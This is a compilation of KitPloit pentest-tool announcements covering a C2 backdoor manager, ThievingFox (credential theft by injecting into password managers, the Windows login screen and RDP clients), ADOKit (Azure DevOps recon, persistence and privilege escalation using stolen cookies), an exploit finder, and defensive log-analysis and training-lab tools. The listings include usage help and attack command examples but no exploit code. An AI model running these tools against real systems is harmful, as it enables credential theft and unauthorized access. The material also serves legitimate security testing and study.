      πŸ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
      πŸ–±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
      πŸ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

      Tech Stack

      πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
      πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
      🌐 Nginx: Effortlessly routing traffic between web and backend systems.
      πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
      πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
      πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.

      Architecture

      Application setup

      • Management port: 9000
• Reverse HTTP port: 8000
      • Reverse TCP port: 8888

      • Clone the repo

• Optional: Update chat_id, bot_token in c2-telegram/config.yml
• Execute docker-compose up -d to start the containers. Note: the c2-api service will not start up until the database is initialized. If you receive 500 errors, please try again after some time.

      Credits

      Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

      License

      Distributed under the MIT License. See LICENSE for more information.


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      OSTE-Web-Log-Analyzer - Automate The Process Of Analyzing Web Server Logs With The Python Web Log Analyzer

      By: Zion3R β€” May 1st 2024 at 12:30


      Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:


      Features

      1. Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.

2. Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools (see the sketch after this list).

      3. Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.

      4. User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.
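As an illustration of the rate-limit check described in feature 2, a sliding-window detector can be sketched in a few lines of Python (thresholds are arbitrary; this is not the analyzer's actual code):

from collections import defaultdict, deque

def find_bursty_ips(events, limit=20, window=10.0):
    """events: time-ordered iterable of (timestamp_seconds, ip) pairs."""
    recent = defaultdict(deque)  # per-IP timestamps inside the window
    flagged = set()
    for ts, ip in events:
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()  # drop requests older than the window
        if len(q) > limit:
            flagged.add(ip)  # too many requests in too short a time frame
    return flagged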

      Future Features

      This project is actively developed, and future features may include:

      1. IP Geolocation: Identify the geographic location of IP addresses in the logs.
      2. Real-time Monitoring: Implement real-time monitoring capabilities for immediate threat detection.

      Installation

      The tool only requires Python 3 at the moment.

1. git clone https://github.com/OSTEsayed/OSTE-Web-Log-Analyzer.git
2. cd OSTE-Web-Log-Analyzer
3. python3 WLA-cli.py

      Usage

After cloning the repository to your local machine, you can initiate the application by executing the command python3 WLA-cli.py. Simple usage example: python3 WLA-cli.py -l LogSampls/access.log -t

Use -h or --help for more detailed usage examples: python3 WLA-cli.py -h

      Contact

LinkedIn: https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

      By: Zion3R β€” April 30th 2024 at 12:30


ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.

      The accompanying blog post can be found here


      Installation

      Linux

Rustup must be installed; follow the instructions available here: https://rustup.rs/

The mingw-w64 package must be installed. On Debian, this can be done using:

      apt install mingw-w64

      Both x86 and x86_64 windows targets must be installed for Rust:

      rustup target add x86_64-pc-windows-gnu
      rustup target add i686-pc-windows-gnu

Mono and Nuget must also be installed; instructions are available here: https://www.mono-project.com/download/stable/#download-lin

After adding the Mono repositories, Nuget can be installed using apt:

      apt install nuget

Finally, Python dependencies must be installed:

      pip install -r client/requirements.txt

ThievingFox works with Python >= 3.11.

      Windows

Rustup must be installed; follow the instructions available here: https://rustup.rs/

      Both x86 and x86_64 windows targets must be installed for Rust:

      rustup target add x86_64-pc-windows-msvc
      rustup target add i686-pc-windows-msvc

      .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

Finally, Python dependencies must be installed:

      pip install -r client/requirements.txt

ThievingFox works with Python >= 3.11.

NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell).

      Targets

All modules have been tested on the following Windows versions:

      Windows Version
      Windows Server 2022
      Windows Server 2019
      Windows Server 2016
      Windows Server 2012R2
      Windows 10
      Windows 11

[!CAUTION] Modules have not been tested on other versions, and are not expected to work on them.

Application | Injection Method
KeePass.exe | AppDomainManager Injection
KeePassXC.exe | DLL Proxying
LogonUI.exe (Windows Login Screen) | COM Hijacking
consent.exe (Windows UAC Popup) | COM Hijacking
mstsc.exe (Windows default RDP client) | COM Hijacking
RDCMan.exe (Sysinternals' RDP client) | COM Hijacking
MobaXTerm.exe (3rd party RDP client) | COM Hijacking

      Usage

      [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

ThievingFox contains 3 main modules: poison, cleanup, and collect.

      Poison

For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the remote host, and modifies the registry if needed to perform COM hijacking.

      To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only currently logged-in users are impacted (all users that have an HKCU hive).

      --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

The KeePass module requires the Visual C++ Redistributable to be installed on the target.

      Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

      [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

      $ python3 client/ThievingFox.py poison -h
      usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
      [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
      [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
      target

      positional arguments:
      target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

      options:
      -h, --help show this help message and exit
      -hashes HASHES, --hashes HASHES
      LM:NT hash
      -aesKey AESKEY, --aesKey AESKEY
      AES key to use for Kerberos Authentication
      -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
      -dc-ip DC_IP, --dc-ip DC_IP
      IP Address of the domain controller
      -no-pass, --no-pass Do not prompt for password
      --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
      --keepass Try to poison KeePass.exe
      --keepass-path KEEPASS_PATH
      The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
      --keepass-share KEEPASS_SHARE
      The share on which KeePass is installed (Default: c$)
      --keepassxc Try to poison KeePassXC.exe
      --keepassxc-path KEEPASSXC_PATH
      The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
      The share on which KeePassXC is installed (Default: c$)
      --mstsc Try to poison mstsc.exe
      --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
      logged in (Default: False)
      --consent Try to poison Consent.exe
      --logonui Try to poison LogonUI.exe
      --rdcman Try to poison RDCMan.exe
      --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
      logged in (Default: False)
      --mobaxterm Try to poison MobaXTerm.exe
      --mobaxterm-poison-hkcr
      Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
      logged in (Default: False)
      --all Try to poison all applications

      Cleanup

For each application specified in the command line parameters, the cleanup module first removes the poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.

For applications that support poisoning of both the HKCU and HKCR hives, both are cleaned up regardless.

      Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

      It does not clean extracted credentials on the remote host.

[!IMPORTANT] If the targeted application is in use while the cleanup module is run, the DLLs that were dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

      $ python3 client/ThievingFox.py cleanup -h
      usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
      [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
      [--rdcman] [--mobaxterm] [--all]
      target

      positional arguments:
      target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

      options:
      -h, --help show this help message and exit
      -hashes HASHES, --hashes HASHES
      LM:NT hash
      -aesKey AESKEY, --aesKey AESKEY
      AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
      -dc-ip DC_IP, --dc-ip DC_IP
      IP Address of the domain controller
      -no-pass, --no-pass Do not prompt for password
      --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
      --keepass Try to cleanup all poisonning artifacts related to KeePass.exe
      --keepass-share KEEPASS_SHARE
      The share on which KeePass is installed (Default: c$)
      --keepass-path KEEPASS_PATH
      The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
      --keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
      --keepassxc-path KEEPASSXC_PATH
      The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
      --keepassxc-share KEEPASSXC_SHARE
      The share on which KeePassXC is installed (Default: c$)
      --mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
      --consent Try to cleanup all poisonning artifacts related to Consent.exe
      --logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
      --rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
      --mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
      --all Try to cleanup all poisonning artifacts related to all applications

      Collect

For each application specified in the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/output/.

      Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

      $ python3 client/ThievingFox.py collect -h
      usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
      [--logonui] [--rdcman] [--mobaxterm] [--all]
      target

      positional arguments:
      target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

      options:
      -h, --help show this help message and exit
      -hashes HASHES, --hashes HASHES
      LM:NT hash
      -aesKey AESKEY, --aesKey AESKEY
      AES key to use for Kerberos Authentication
      -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
      -dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
      -no-pass, --no-pass Do not prompt for password
      --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
      --keepass Collect KeePass.exe logs
      --keepassxc Collect KeePassXC.exe logs
      --mstsc Collect mstsc.exe logs
      --consent Collect Consent.exe logs
      --logonui Collect LogonUI.exe logs
      --rdcman Collect RDCMan.exe logs
      --mobaxterm Collect MobaXTerm.exe logs
      --all Collect logs from all applications


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

      By: Zion3R β€” April 27th 2024 at 16:55



Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0. Created by BLACK-SCORP10 (t.me/BLACK-SCORP10).

      Features

      • Check the status of single or multiple URLs/domains.
• Asynchronous HTTP requests for improved performance (see the sketch after this list).
      • Color-coded output for better visualization of status codes.
      • Progress bar when checking multiple URLs.
      • Save results to an output file.
      • Error handling for inaccessible URLs and invalid responses.
      • Command-line interface for easy usage.
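To show what the asynchronous checking amounts to, here is a minimal aiohttp-based sketch (illustrative; not necessarily how status_checker.py is implemented):

import asyncio
import aiohttp

async def check(session, url):
    try:
        async with session.get(url, timeout=aiohttp.ClientTimeout(total=10)) as r:
            return url, r.status
    except (aiohttp.ClientError, asyncio.TimeoutError):
        return url, None  # inaccessible URL or invalid response

async def main(urls):
    async with aiohttp.ClientSession() as session:
        results = await asyncio.gather(*(check(session, u) for u in urls))
        for url, status in results:
            print(status if status else "ERR", url)

asyncio.run(main(["https://example.com", "https://example.org"]))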

      Installation

      1. Clone the repository:

git clone https://github.com/your_username/status-checker.git
cd status-checker

      1. Install dependencies:

pip install -r requirements.txt

      Usage

      python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
      • -d, --domain: Single domain/URL to check.
      • -l, --list: File containing a list of domains/URLs to check.
      • -o, --output: File to save the output.
      • -v, --version: Display version information.
      • -update: Update the tool.

      Example:

      python status_checker.py -l urls.txt -o results.txt


      License

      This project is licensed under the MIT License - see the LICENSE file for details.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      CSAF - Cyber Security Awareness Framework

      By: Zion3R β€” April 26th 2024 at 12:30

The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational materials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.


      Requirements

      Software

      • Docker
      • Docker-compose

      Hardware

      Minimum

      • 4 Core CPU
      • 10GB RAM
      • 60GB Disk free

      Recommendation

      • 8 Core CPU or above
      • 16GB RAM or above
      • 100GB Disk free or above

      Installation

      Clone the repository

      git clone https://github.com/csalab-id/csaf.git

      Navigate to the project directory

      cd csaf

      Pull the Docker images

      docker-compose --profile=all pull

Generate the Wazuh SSL certificates

      docker-compose -f generate-indexer-certs.yml run --rm generator

For security reasons, you should first set environment variables like this:

      export ATTACK_PASS=ChangeMePlease
      export DEFENSE_PASS=ChangeMePlease
      export MONITOR_PASS=ChangeMePlease
      export SPLUNK_PASS=ChangeMePlease
      export GOPHISH_PASS=ChangeMePlease
      export MAIL_PASS=ChangeMePlease
      export PURPLEOPS_PASS=ChangeMePlease

      Start all the containers

      docker-compose --profile=all up -d

You can run specific profiles for running specific labs, with the following profiles:
• all
• attackdefenselab
• phisinglab
• breachlab
• soclab

      For example

      docker-compose --profile=attackdefenselab up -d


      Exposed Ports

An exposed port can be accessed using a SOCKS5 proxy client, an SSH client, or an HTTP client. Choose one for the best experience.

      • Port 6080 (Access to attack network)
      • Port 7080 (Access to defense network)
      • Port 8080 (Access to monitor network)

      Example usage

      Access internal network with proxy socks5

      • curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html
      • curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html
      • curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html

      Remote ssh with ssh client

      • ssh kali@ipaddress -p 6080 (default password: attackpassword)
      • ssh kali@ipaddress -p 7080 (default password: defensepassword)
      • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

      Access kali linux desktop with curl / browser

      • curl http://ipaddress:6080/vnc.html
      • curl http://ipaddress:7080/vnc.html
      • curl http://ipaddress:8080/vnc.html

      Domain Access

      • http://attack.lab/vnc.html (default password: attackpassword)
      • http://defense.lab/vnc.html (default password: defensepassword)
      • http://monitor.lab/vnc.html (default password: monitorpassword)
      • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
• https://server.lab/ (default username: postmaster@server.lab, default password: mailpassword)
• https://server.lab/iredadmin/ (default username: postmaster@server.lab, default password: mailpassword)
• https://mail.server.lab/ (default username: postmaster@server.lab, default password: mailpassword)
• https://mail.server.lab/iredadmin/ (default username: postmaster@server.lab, default password: mailpassword)
• http://phising.lab/
• http://10.0.0.200:8081/
• http://gitea.lab/ (default username: csalab, default password: giteapassword)
• http://dvwa.lab/ (default username: admin, default password: password)
• http://dvwa-monitor.lab/ (default username: admin, default password: password)
• http://dvwa-modsecurity.lab/ (default username: admin, default password: password)
• http://wackopicko.lab/
• http://juiceshop.lab/
• https://wazuh-indexer.lab:9200/ (default username: admin, default password: SecretPassword)
• https://wazuh-manager.lab/
• https://wazuh-dashboard.lab:5601/ (default username: admin, default password: SecretPassword)
      • http://splunk.lab/ (default username: admin, default password: splunkpassword)
      • https://infectionmonkey.lab:5000/
      • http://purpleops.lab/ (default username: admin@purpleops.com, default password: purpleopspassword)
      • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

      Network / IP Address

      Attack

      • 10.0.0.100 attack.lab
      • 10.0.0.200 phising.lab
      • 10.0.0.201 server.lab
      • 10.0.0.201 mail.server.lab
      • 10.0.0.202 gophish.lab
      • 10.0.0.110 infectionmonkey.lab
      • 10.0.0.111 mongodb.lab
      • 10.0.0.112 purpleops.lab
      • 10.0.0.113 caldera.lab

      Defense

      • 10.0.1.101 defense.lab
      • 10.0.1.10 dvwa.lab
      • 10.0.1.13 wackopicko.lab
      • 10.0.1.14 juiceshop.lab
      • 10.0.1.20 gitea.lab
      • 10.0.1.110 infectionmonkey.lab
      • 10.0.1.112 purpleops.lab
      • 10.0.1.113 caldera.lab

      Monitor

      • 10.0.3.201 server.lab
      • 10.0.3.201 mail.server.lab
      • 10.0.3.9 mariadb.lab
      • 10.0.3.10 dvwa.lab
      • 10.0.3.11 dvwa-monitor.lab
      • 10.0.3.12 dvwa-modsecurity.lab
      • 10.0.3.102 monitor.lab
      • 10.0.3.30 wazuh-manager.lab
      • 10.0.3.31 wazuh-indexer.lab
      • 10.0.3.32 wazuh-dashboard.lab
      • 10.0.3.40 splunk.lab

      Public

      • 10.0.2.101 defense.lab
      • 10.0.2.13 wackopicko.lab

      Internet

      • 10.0.4.102 monitor.lab
      • 10.0.4.30 wazuh-manager.lab
      • 10.0.4.32 wazuh-dashboard.lab
      • 10.0.4.40 splunk.lab

      Internal

      • 10.0.5.100 attack.lab
      • 10.0.5.12 dvwa-modsecurity.lab
      • 10.0.5.13 wackopicko.lab

      License

      This Docker Compose application is released under the MIT License. See the LICENSE file for details.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Sicat - The Useful Exploit Finder

      By: Zion3R β€” April 9th 2024 at 12:30

      Introduction

      SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

      SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.



      Installation

      git clone https://github.com/justakazh/sicat.git && cd sicat

      pip install -r requirements.txt

      Usage


      ~$ python sicat.py --help

      Command Line Options:

Command | Description
-h | Show help message and exit
-k KEYWORD | Keyword to search for
-kv KEYWORD_VERSION | Keyword version to search for
-nm | Identify via nmap output
--nvd | Use NVD as info source
--packetstorm | Use PacketStorm as info source
--exploitdb | Use ExploitDB as info source
--exploitalert | Use ExploitAlert as info source
--msfmodule | Use Metasploit as info source
-o OUTPUT | Path to save output to
-ot OUTPUT_TYPE | Output file type: json or html

      Examples

      From keyword


      python sicat.py -k telerik --exploitdb --msfmodule

      From nmap output


      nmap --open -sV localhost -oX nmap_out.xml
      python sicat.py -nm nmap_out.xml --packetstorm

      To-do

• [ ] Input nmap results from a pipeline
      • [ ] Nmap multiple host support
      • [ ] Search NSE Script
      • [ ] Search by PORT

      Contribution

      I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      ADOKit - Azure DevOps Services Attack Toolkit

      By: Zion3R β€” April 6th 2024 at 11:30


      Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

      Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


      Installation/Building

      Libraries Used

      The below 3rd party libraries are used in this project.

Library | URL | License
Fody | https://github.com/Fody/Fody | MIT License
Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | MIT License

      Pre-Compiled

      • Use the pre-compiled binary in Releases

      Building Yourself

Take the below steps to set up Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

      • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
      • Go to "NuGet Package Manager" --> "Package Sources"
      • Add a package source with the URL https://api.nuget.org/v3/index.json
      • Install the Costura.Fody NuGet package.
      • Install-Package Costura.Fody -Version 3.3.3
      • Install the Newtonsoft.Json package
      • Install-Package Newtonsoft.Json
      • You can now build the project yourself!

      Command Modules

      • Recon
      • check - Check whether organization uses Azure DevOps and if credentials are valid
      • whoami - List the current user and its group memberships
      • listrepo - List all repositories
      • searchrepo - Search for given repository
      • listproject - List all projects
      • searchproject - Search for given project
      • searchcode - Search for code containing a search term
      • searchfile - Search for file based on a search term
      • listuser - List users
      • searchuser - Search for a given user
      • listgroup - List groups
      • searchgroup - Search for a given group
      • getgroupmembers - List all group members for a given group
      • getpermissions - Get the permissions for who has access to a given project
      • Persistence
      • createpat - Create personal access token for user
      • listpat - List personal access tokens for user
      • removepat - Remove personal access token for user
      • createsshkey - Create public SSH key for user
      • listsshkey - List public SSH keys for user
      • removesshkey - Remove public SSH key for user
      • Privilege Escalation
      • addprojectadmin - Add a user to the "Project Administrators" for a given project
      • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
      • addbuildadmin - Add a user to the "Build Administrators" group for a given project
      • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
      • addcollectionadmin - Add a user to the "Project Collection Administrators" group
      • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
      • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
      • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
      • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
      • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
      • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
      • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
      • getpipelinevars - Retrieve any pipeline variables used for a given project.
      • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
      • getserviceconnections - Retrieve the service connections used for a given project.

      Arguments/Options

      • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
      • /url: - Azure DevOps URL. Applicable to all modules.
      • /search: - Keyword to search for. Not applicable to all modules.
      • /project: - Project to perform an action for. Not applicable to all modules.
      • /user: - Perform an action against a specific user. Not applicable to all modules.
      • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
      • /group: - Perform an action against a specific group. Not applicable to all modules.

      Authentication Options

      Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

      • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the .dev.azure.com domain.
      • /credential:UserAuthentication=ABC123
      • Personal Access Token (PAT) - This will be an access token/API key that will be a single string.
      • /credential:apiToken

      Module Details Table

      The below table shows the permissions required for each module.

Attack Scenario | Module | Special Permissions?
Recon | check | No
Recon | whoami | No
Recon | listrepo | No
Recon | searchrepo | No
Recon | listproject | No
Recon | searchproject | No
Recon | searchcode | No
Recon | searchfile | No
Recon | listuser | No
Recon | searchuser | No
Recon | listgroup | No
Recon | searchgroup | No
Recon | getgroupmembers | No
Recon | getpermissions | No
Persistence | createpat | No
Persistence | listpat | No
Persistence | removepat | No
Persistence | createsshkey | No
Persistence | listsshkey | No
Persistence | removesshkey | No
Privilege Escalation | addprojectadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation | removeprojectadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation | addbuildadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation | removebuildadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation | addcollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation | removecollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation | addcollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation | removecollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation | addcollectionbuildsvc | Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts
Privilege Escalation | removecollectionbuildsvc | Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts
Privilege Escalation | addcollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation | removecollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation | getpipelinevars | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation | getpipelinesecrets | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation | getserviceconnections | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts

      Examples

      Validate Azure DevOps Access

      Use Case

      Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.

      Syntax

      Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

      ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: check
      Auth Type: API Key
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/28/2023 3:33:01 PM
      ==================================================


      [*] INFO: Checking if organization provided uses Azure DevOps

      [+] SUCCESS: Organization provided exists in Azure DevOps


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      3/28/23 19:33:02 Finished execution of check

      Whoami

      Use Case

Get the current user and the user's group memberships

      Syntax

Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of its group memberships.

      ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: whoami
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 11:33:12 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Username | Display Name | UPN
      ------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com


      [*] INFO: Listing group memberships for the current user


      Group UPN | Display Name | Description
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
      [TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
      [MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
      [YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

      4/4/23 15:33:19 Finished execution of whoami

      List Repos

      Use Case

      Discover repositories being used in Azure DevOps instance

      Syntax

      Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

      ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName

